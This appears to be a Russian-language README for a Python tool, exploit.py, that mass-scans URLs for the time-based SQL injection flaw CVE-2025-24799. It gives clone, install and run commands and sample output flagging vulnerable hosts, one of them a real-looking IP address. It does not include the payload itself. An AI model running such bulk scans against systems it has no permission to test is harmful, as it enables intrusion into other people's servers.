
CVE-2025-24799 SQLi-сканер
Быстрый сканер уязвимостей SQL-инъекций, написанный на Python. Использует обнаружение SQLi на основе временных задержек с многопоточностью и цветным выводом, предназначен для тестирования уязвимостей CVE-2025-24799.
Клонируйте репозиторий:
git clone https://github.com/MuhammadWaseem29/CVE-2025-24799.git
cd CVE-2025-24799
Установите необходимые пакеты:
pip install requests colorama
Запуск с Python 3:
python3 exploit.py -u http://example.com
Вывод:
[VULN] http://example.com/index.php/ajax/ - Delay: 7.40s
python3 exploit.py -f urls.txt -t 15
Вывод:
Scanning: 100/1000 (10.0%)
[VULN] http://example.com/index.php/ajax/ - Delay: 7.10s
python3 exploit.py -f urls.txt -o results.txt -t 10
Вывод:
Scanning: 50/500 (10.0%)
[VULN] http://test.com/index.php/ajax/ - Delay: 7.20s
[+] Results saved to results.txt

Проверка через curl

-u <URL>: Один URL-адрес для сканирования-f <FILE>: Файл с URL-адресами (по одному в строке)-o <FILE>: Сохранить результаты в файл-t <NUM>: Количество потоков (по умолчанию: 10)╔════════════════════════════╗
║ Noob-Wasi SQLi Scanner ║
║ Coded by: Noob-Wasi ║
║ Version: 1.0 ║
╚════════════════════════════╝
Starting SQL injection scan...
Scanning: 200/3494 (5.7%)
[VULN] http://152.67.42.99/index.php/ajax/ - Delay: 7.40s
Scanning: 745/3494 (21.3%)
Scan completed!
-t) в зависимости от вашей системы/сетиАвтор: Noob-Wasi
GitHub: github.com/MuhammadWaseem29